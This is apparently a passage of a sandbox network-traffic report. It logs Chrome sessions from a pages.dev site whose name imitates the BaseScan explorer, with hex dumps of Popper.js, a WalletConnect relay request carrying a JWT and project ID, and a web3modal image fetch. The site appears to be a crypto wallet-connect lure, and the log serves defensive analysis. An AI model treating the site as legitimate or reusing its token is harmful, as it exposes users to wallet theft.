                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58861
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDsPjD1EiE0JE%2Bulkae2KuL9hr5%2BV%2FPeVjzZ8%2BMwnJQfbBWR2WJGVA5eygRP5xTnHIt8paMq7W9Wt%2FqdMUuD6POHfk2P2HDnaA1m9deimJvxXiCy4XbTHuG52g%2BtxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d7f9cf4225-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC549INData Raw: 35 30 33 64 0d 0a 2f 2a 0d 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 38 0d 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0d 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69
                                                                                                                                                                                                                                              Data Ascii: 503d/* Copyright (C) Federico Zivolo 2018 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof defi
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65 74 75 72 6e 20 65 2e 62 6f 64 79 3b 7d 76 61 72 20 69 3d 74 28 65 29 2c 72 3d 69 2e 6f 76 65 72 66 6c 6f 77 2c 70 3d 69 2e 6f 76 65 72 66 6c 6f 77 58 2c 73 3d 69 2e 6f 76 65 72 66 6c 6f 77 59 3b 72 65 74 75 72 6e 20 2f 28 61 75 74 6f 7c 73 63 72 6f 6c 6c 7c 6f 76 65 72 6c 61 79 29 2f 2e 74 65 73 74 28 72 2b 73 2b 70 29 3f 65 3a 6e 28 6f 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72
                                                                                                                                                                                                                                              Data Ascii: on n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){r
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 69 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 6e 3d 6c 28 74 2c 27 74 6f 70 27 29 2c 69 3d 6c 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 6e 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 6e 2a 72 2c 65 2e 6c 65 66 74 2b 3d 69 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 69 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54
                                                                                                                                                                                                                                              Data Ascii: crollingElement||i;return r[o]}return e[o]}function f(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],n=l(t,'top'),i=l(t,'left'),r=o?-1:1;return e.top+=n*r,e.bottom+=n*r,e.left+=i*r,e.right+=i*r,e}function m(e,t){var o='x'===t?'Left':'T
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 70 3d 72 28 31 30 29 2c 73 3d 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 64 3d 75 28 65 29 2c 61 3d 75 28 6f 29 2c 6c 3d 6e 28 65 29 2c 6d 3d 74 28 6f 29 2c 68 3d 70 61 72 73 65 46 6c 6f 61 74 28 6d 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 31 30 29 2c 63 3d 70 61 72 73 65 46 6c 6f 61 74 28 6d 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2c 31 30 29 3b 69 26 26 73 26 26 28 61 2e 74 6f 70 3d 4a 28 61 2e 74 6f 70 2c 30 29 2c 61 2e 6c 65 66 74 3d 4a 28 61 2e 6c 65 66 74 2c 30 29 29 3b 76 61 72 20 62 3d 67 28 7b 74 6f 70 3a 64 2e 74 6f 70 2d 61 2e 74 6f 70 2d 68 2c 6c 65 66 74 3a 64 2e 6c 65 66 74 2d 61 2e 6c 65 66 74 2d 63 2c 77 69 64 74 68 3a 64 2e 77 69 64 74 68 2c 68 65 69
                                                                                                                                                                                                                                              Data Ascii: s[2]&&arguments[2],p=r(10),s='HTML'===o.nodeName,d=u(e),a=u(o),l=n(e),m=t(o),h=parseFloat(m.borderTopWidth,10),c=parseFloat(m.borderLeftWidth,10);i&&s&&(a.top=J(a.top,0),a.left=J(a.left,0));var b=g({top:d.top-a.top-h,left:d.left-a.left-c,width:d.width,hei
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 3f 6c 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 6c 3d 72 3b 76 61 72 20 66 3d 62 28 6c 2c 64 2c 70 29 3b 69 66 28 27 48 54 4d 4c 27 3d 3d 3d 6c 2e 6e 6f 64 65 4e 61 6d 65 26 26 21 77 28 64 29 29 7b 76 61 72 20 6d 3d 63 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 2c 68 3d 6d 2e 68 65 69 67 68 74 2c 67 3d 6d 2e 77 69 64 74 68 3b 73 2e 74 6f 70 2b 3d 66 2e 74 6f 70 2d 66 2e 6d 61 72 67 69 6e 54 6f 70 2c 73 2e 62 6f 74 74 6f 6d 3d 68 2b 66 2e 74 6f 70 2c 73 2e 6c 65 66 74 2b 3d 66 2e 6c 65 66 74 2d 66 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 73 2e 72 69 67 68 74 3d 67 2b 66 2e 6c 65 66 74 7d 65 6c 73 65 20 73 3d 66 7d 69 3d 69 7c 7c 30 3b 76 61 72 20 75 3d 27 6e 75 6d 62 65 72 27 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                                              Data Ascii: ?l=e.ownerDocument.documentElement:l=r;var f=b(l,d,p);if('HTML'===l.nodeName&&!w(d)){var m=c(e.ownerDocument),h=m.height,g=m.width;s.top+=f.top-f.marginTop,s.bottom=h+f.top,s.left+=f.left-f.marginLeft,s.right=g+f.left}else s=f}i=i||0;var u='number'==typeo
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 6c 65 66 74 27 2c 62 6f 74 74 6f 6d 3a 27 74 6f 70 27 2c 74 6f 70 3a 27 62 6f 74 74 6f 6d 27 7d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 6c 65 66 74 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 74 6f 70 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 2c 6f 29 7b 6f 3d 6f 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 3b 76 61 72 20 6e 3d 53 28 65 29 2c 69 3d 7b 77 69 64 74 68 3a 6e 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6e 2e 68 65 69 67 68 74 7d 2c 72 3d 2d 31 21 3d 3d 5b 27 72 69 67 68 74 27 2c 27 6c 65 66 74 27 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 2c 70 3d 72 3f 27 74 6f 70 27 3a 27 6c 65 66 74 27 2c 73 3d 72 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 64 3d 72 3f
                                                                                                                                                                                                                                              Data Ascii: left',bottom:'top',top:'bottom'};return e.replace(/left|right|bottom|top/g,function(e){return t[e]})}function D(e,t,o){o=o.split('-')[0];var n=S(e),i={width:n.width,height:n.height},r=-1!==['right','left'].indexOf(o),p=r?'top':'left',s=r?'left':'top',d=r?
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 69 73 2e 70 6f 70 70 65 72 2c 65 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2e 70 6f 73 69 74 69 6f 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 3f 27 66 69 78 65 64 27 3a 27 61 62 73 6f 6c 75 74 65 27 2c 65 3d 50 28 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2c 65 29 2c 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 55 70 64 61 74 65 28 65 29 3a 28 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3d 21 30 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 43 72 65 61 74 65 28 65 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 57 28 65 2c 74 29 7b 72 65 74 75
                                                                                                                                                                                                                                              Data Ascii: is.popper,e.offsets.reference,e.placement),e.offsets.popper.position=this.options.positionFixed?'fixed':'absolute',e=P(this.modifiers,e),this.state.isCreated?this.options.onUpdate(e):(this.state.isCreated=!0,this.options.onCreate(e))}}function W(e,t){retu
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 61 62 6c 65 64 3d 21 30 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 7c 7c 28 74 68 69 73 2e 73 74 61 74 65 3d 46 28 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 74 68 69 73 2e 73 74 61 74 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 28 65 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 74 2e 75 70 64 61 74 65 42 6f 75 6e 64 29 2c 74 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28
                                                                                                                                                                                                                                              Data Ascii: abled=!0,o}function I(){this.state.eventsEnabled||(this.state=F(this.reference,this.options,this.state,this.scheduleUpdate))}function R(e,t){return A(e).removeEventListener('resize',t.updateBound),t.scrollParents.forEach(function(e){e.removeEventListener(
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 3a 5c 2d 7c 5c 2b 29 3f 5c 64 2a 5c 2e 3f 5c 64 2a 29 28 2e 2a 29 2f 29 2c 72 3d 2b 69 5b 31 5d 2c 70 3d 69 5b 32 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 65 3b 69 66 28 30 3d 3d 3d 70 2e 69 6e 64 65 78 4f 66 28 27 25 27 29 29 7b 76 61 72 20 73 3b 73 77 69 74 63 68 28 70 29 7b 63 61 73 65 27 25 70 27 3a 73 3d 6f 3b 62 72 65 61 6b 3b 63 61 73 65 27 25 27 3a 63 61 73 65 27 25 72 27 3a 64 65 66 61 75 6c 74 3a 73 3d 6e 3b 7d 76 61 72 20 64 3d 67 28 73 29 3b 72 65 74 75 72 6e 20 64 5b 74 5d 2f 31 30 30 2a 72 7d 69 66 28 27 76 68 27 3d 3d 3d 70 7c 7c 27 76 77 27 3d 3d 3d 70 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 27 76 68 27 3d 3d 3d 70 3f 4a 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69
                                                                                                                                                                                                                                              Data Ascii: :\-|\+)?\d*\.?\d*)(.*)/),r=+i[1],p=i[2];if(!r)return e;if(0===p.indexOf('%')){var s;switch(p){case'%p':s=o;break;case'%':case'%r':default:s=n;}var d=g(s);return d[t]/100*r}if('vh'===p||'vw'===p){var a;return a='vh'===p?J(document.documentElement.clientHei
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1369INData Raw: 70 2d 3d 6f 5b 31 5d 29 3a 27 62 6f 74 74 6f 6d 27 3d 3d 3d 64 26 26 28 70 2e 6c 65 66 74 2b 3d 6f 5b 30 5d 2c 70 2e 74 6f 70 2b 3d 6f 5b 31 5d 29 2c 65 2e 70 6f 70 70 65 72 3d 70 2c 65 7d 66 6f 72 28 76 61 72 20 51 3d 4d 61 74 68 2e 6d 69 6e 2c 5a 3d 4d 61 74 68 2e 72 6f 75 6e 64 2c 24 3d 4d 61 74 68 2e 66 6c 6f 6f 72 2c 4a 3d 4d 61 74 68 2e 6d 61 78 2c 65 65 3d 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2c 74 65 3d 5b 27 45 64 67 65 27 2c 27 54 72 69 64 65 6e 74 27 2c 27 46 69 72 65 66 6f 78 27 5d 2c 6f 65 3d 30 2c 6e 65 3d 30 3b 6e 65 3c 74 65 2e 6c 65 6e 67 74 68 3b 6e 65 2b 3d 31 29 69 66 28 65 65 26 26 30 3c 3d 6e 61 76 69 67
                                                                                                                                                                                                                                              Data Ascii: p-=o[1]):'bottom'===d&&(p.left+=o[0],p.top+=o[1]),e.popper=p,e}for(var Q=Math.min,Z=Math.round,$=Math.floor,J=Math.max,ee='undefined'!=typeof window&&'undefined'!=typeof document,te=['Edge','Trident','Firefox'],oe=0,ne=0;ne<te.length;ne+=1)if(ee&&0<=navig


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              82192.168.2.5498203.126.230.1774435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC1157OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWtqZkVuWFNaR2RzR1l3QTN5dmVkUnRRZnpBZ1NEODVjVjRLUHBVNXhqeTcyRSIsInN1YiI6ImEzMjNmZGIwNjcxN2NkZDQ5NWY1MTk0YWJhMmQ1MWE5MTgzN2YyMGVmNzcxYzU4YjczZjZlNGY5MTc5N2Q5NDUiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcyNzQ4NjE2MywiZXhwIjoxNzI3NTcyNTYzfQ.2IWsPgcbMuIAni5_gbMYD5pXX-WzvGHhTKC-ylw8b33VlwvEvd8QPOwVO4Nu0f-VxqWh34Oo3yeGn9wSJ6hoCA&projectId=9a504add1206ecb902aee52264862b81&ua=wc-2%2Fjs-2.10.2%2Fwindows10-chrome-117.0.0%2Fbrowser%3Abasescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev&useOnCloseEvent=true HTTP/1.1
                                                                                                                                                                                                                                              Host: relay.walletconnect.org
                                                                                                                                                                                                                                              Connection: Upgrade
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Upgrade: websocket
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Sec-WebSocket-Key: yNOx0tgGiC5zUoFzamZddw==
                                                                                                                                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC126INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                              date: Sat, 28 Sep 2024 01:16:05 GMT
                                                                                                                                                                                                                                              2024-09-28 01:16:05 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                                                                                                                                                                                              Data Ascii: Connection header did not include 'upgrade'


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              83192.168.2.549825104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC806OUTGET /public/getAssetImage/0c2840c3-5b04-4c44-9661-fbd4b49e1800 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 4356
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2db8834427c-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 20153
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cf3ispWE62A-P6WwAnoXfYmxdfUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:06 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=710+19 c=1+18 v=2024.9.3 l=4356 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC588INData Raw: 52 49 46 46 fc 10 00 00 57 45 42 50 56 50 38 20 f0 10 00 00 50 60 00 9d 01 2a 90 01 90 01 3e 49 24 91 46 22 a2 22 21 23 52 48 80 50 09 09 65 6e f8 5f bd f1 b0 ef 03 ff 5b dc a3 bb 73 ff c5 d8 84 df fb ef 58 63 20 9f 96 7e 54 6d 24 73 ef eb 5f af df d5 3f 68 7a e4 75 97 ba ff 92 de ec de a0 c7 5f d3 2f 63 fe ed fd a7 f7 47 fc 7f d2 4f 40 1f 76 fe e0 1f c2 ff 8b ff 7f fe c9 fe 03 ff 27 f9 df 8a 4f 50 1f b6 9e a0 3f 57 3f e3 ff 74 f7 8f fe d1 fe c3 fb a7 b9 af f3 5f d6 3f 54 3f ba 7c 80 7f 57 ff 01 e9 01 ec 19 e8 09 fb 01 e9 69 ff a7 fd 1f fd 9f 93 9f d9 6f fd 1f e5 bf f6 fc 8e fe d0 7f d6 f6 00 ff ff ea 01 d5 3f d5 af f2 dd ad 7f 74 c8 20 11 7f 8d fd 95 fd cf f5 ce 28 f8 04 7e 2d fc e7 75 8c 00 6e 87 e2 01 c0 c3 e7 7e c0 1f 97 fd 03 3e ac f3 ef f5 47 b0 87
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 P`*>I$F""!#RHPen_[sXc ~Tm$s_?hzu_/cGO@v'OP?W?t_?T?|Wio?t (~-un~>G
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 92 dc 4d b8 d9 a1 bb 53 8d e6 59 88 52 09 2d 0a 92 35 ac c8 8c 5e 0a 9c 4e 21 0a 4c 83 9f 1a 46 6c 34 9e b1 4e 07 e6 53 63 7e 20 a3 aa ef 78 38 bd 64 69 13 5e 4c 15 39 b2 ad b5 31 2b 59 4e 2d e6 14 53 82 a7 0e ea 64 7c e2 9f ae 0d 10 45 30 16 01 cb de c6 cd 5b f8 08 c8 f2 c1 43 8e 7e 8d 6b b3 79 42 e3 8e 07 10 54 e6 40 93 c3 9d ac 51 f7 09 37 da 6c 93 1d 89 b5 c3 4c c0 08 3c 30 79 bc 4a b5 fb f0 41 be dd f1 4f 76 f4 bd 39 3b b4 de c7 6c b0 a4 bd 5f 40 38 8d 77 20 59 b2 72 ea 71 46 e3 cf 11 32 56 b0 62 9d 37 ef 52 10 bd d1 d1 0d 5e ea b5 e0 d8 91 38 81 4a c9 c1 b5 22 5e e5 1e c8 57 5c bd d2 75 c5 8c 1a db 0e 3c 6f 63 b6 14 00 00 fe 87 1b 5c f5 fc 43 8f c4 38 e2 1c 70 13 a8 e1 1e f3 10 c5 8d 50 f9 4d 6f bb 1b 22 71 0e ad a0 14 40 84 3b 61 be af e9 a4 ed 87
                                                                                                                                                                                                                                              Data Ascii: MSYR-5^N!LFl4NSc~ x8di^L91+YN-Sd|E0[C~kyBT@Q7lL<0yJAOv9;l_@8w YrqF2Vb7R^8J"^W\u<oc\C8pPMo"q@;a
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1369INData Raw: 38 b5 09 4e 7a 03 2a c1 bd a1 92 4b 93 76 70 5a 9c 95 2e 61 b2 6b 40 f5 9a 67 82 45 98 6b 24 a7 d6 76 d2 c3 0f 2a 45 13 40 00 01 c4 cf 7b 9c 6c 87 4a 8c 9f 2c b8 7c 25 3f a0 88 14 2f bf 74 74 14 7b df 34 76 b2 ac b2 b5 90 95 04 dc de c6 68 fc be 58 f9 e7 05 95 ae 33 e7 47 1d ab 6f 65 44 11 df 36 98 a1 f0 de ff 4b 15 04 df bc ef 85 81 dd 14 72 84 7b 17 7e 8c f4 da 69 30 33 06 e0 2e 0a 1b 50 29 5b 48 0a 69 fb 9f c2 fb 6c 39 06 c4 40 f1 b8 72 22 bb ff 3b c3 85 ad f6 95 db fe 0c a0 3f d8 11 7e 7c b4 05 bc bc 34 20 7f f3 12 c4 19 81 7d 05 34 fc fb 67 db 36 fe 10 dd 74 2f d8 cd 7a fc 6a 25 58 8b 09 d4 d4 4f 87 3d 4a 84 a6 dc 64 db e9 a1 bc c1 57 52 da 37 f4 eb 4f 78 66 0e 60 41 c7 7f 30 f8 28 e5 27 11 92 c0 75 e5 33 67 9e ac 64 88 0e 41 ac 00 e8 23 9e 29 52 02
                                                                                                                                                                                                                                              Data Ascii: 8Nz*KvpZ.ak@gEk$v*E@{lJ,|%?/tt{4vhX3GoeD6Kr{~i03.P)[Hil9@r";?~|4 }4g6t/zj%XO=JdWR7Oxf`A0('u3gdA#)R
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC1030INData Raw: 6a 9e 72 6e ca e0 30 92 7d 7b d5 45 1a 80 dc f8 d5 20 a1 f8 66 68 90 21 52 31 a8 48 f5 e6 36 f1 48 ad 5d f5 b5 c5 f2 a8 a9 f1 e5 1a 94 70 7c f4 a3 18 67 0e 4c ad 8a f5 2a 6e df 2d 7a 71 94 19 ce fb 4e 4b 11 89 5a 58 57 6f e0 4f 2b ed 73 04 59 5f 90 00 e9 77 7b ec 35 c6 26 44 67 17 5e d1 a6 45 55 02 e7 bd dc c0 f5 28 38 33 6f 7c 59 1e c6 74 a3 96 61 61 18 ff 8f 92 a6 39 fb 16 f2 77 94 75 c1 68 4a ab 10 6b c6 49 d6 a8 84 4b 2e 6b a8 26 7c e0 36 3a 0a a3 db a6 fd f0 fc d9 00 0e d6 b0 e3 91 be 02 e8 a2 01 84 1f f3 ea ef b9 28 1e 7d 4d 49 d5 a3 22 cd 94 14 8a cd 3a 5d f4 d2 76 c5 0d d2 fd 24 d5 69 eb 35 1c 86 e2 ab 95 48 64 e9 3e 01 4d c4 70 19 cb 37 bb 0b 6e 2a ef 49 dc cc 5b 12 f6 76 94 57 38 51 fa fb 53 23 70 5a 76 07 60 54 c9 91 de fc 5a 9b 0a 69 e6 77 9f
                                                                                                                                                                                                                                              Data Ascii: jrn0}{E fh!R1H6H]p|gL*n-zqNKZXWoO+sY_w{5&Dg^EU(83o|Ytaa9wuhJkIK.k&|6:(}MI":]v$i5Hd>Mp7n*I[vW8QS#pZv`TZiw


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              84192.168.2.549824104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
